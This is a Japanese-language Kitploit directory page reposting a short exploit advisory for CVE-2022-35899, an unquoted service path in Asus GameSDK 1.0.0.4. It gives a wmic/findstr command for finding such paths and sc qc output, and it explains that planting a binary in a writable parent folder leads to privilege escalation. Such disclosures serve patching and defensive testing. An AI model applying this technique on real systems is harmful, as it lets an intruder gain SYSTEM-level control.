Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-35899 — 引用符なしサービスパス Asus GameSdk | Kitploit
ツール/GitHubGitHub/angelopioamirante/cve-2022-35899
特権昇格脆弱性分析エクスプロイト設定ミス
GitHubangelopioamirante/cve-2022-35899

CVE-2022-35899

引用符なしサービスパス Asus GameSdk

リポジトリを見る
34年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-35899

引用符なしサービスパス Asus GameSdk

エクスプロイトタイトル: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' 引用符なしサービスパス (特権昇格)

日付: 07/14/2022

エクスプロイト作者: Angelo Pio Amirante

バージョン: 1.0.0.4

テスト環境: Windows 10

修正バージョン: 1.0.5.0

引用符なしサービスパスを発見する手順:

root@kitploit:~
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

サービス情報:

root@kitploit:~
C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

エクスプロイト

攻撃者がすでにシステムを侵害しており、現在のユーザーが "C:\Program Files (x86)\ASUS" フォルダまたは "C:" に書き込む権限を持っている場合、それぞれ "Program.exe" または "GameSDK.exe" ファイルを配置し、サービスが起動すると、元の "GameSDK.exe" ではなく悪意のあるファイルが実行される可能性があります。

影響

攻撃者はシステム上の権限を昇格させることができます。

POC ビデオ

https://youtu.be/u_8JMIgn-5g

ツールをダウンロード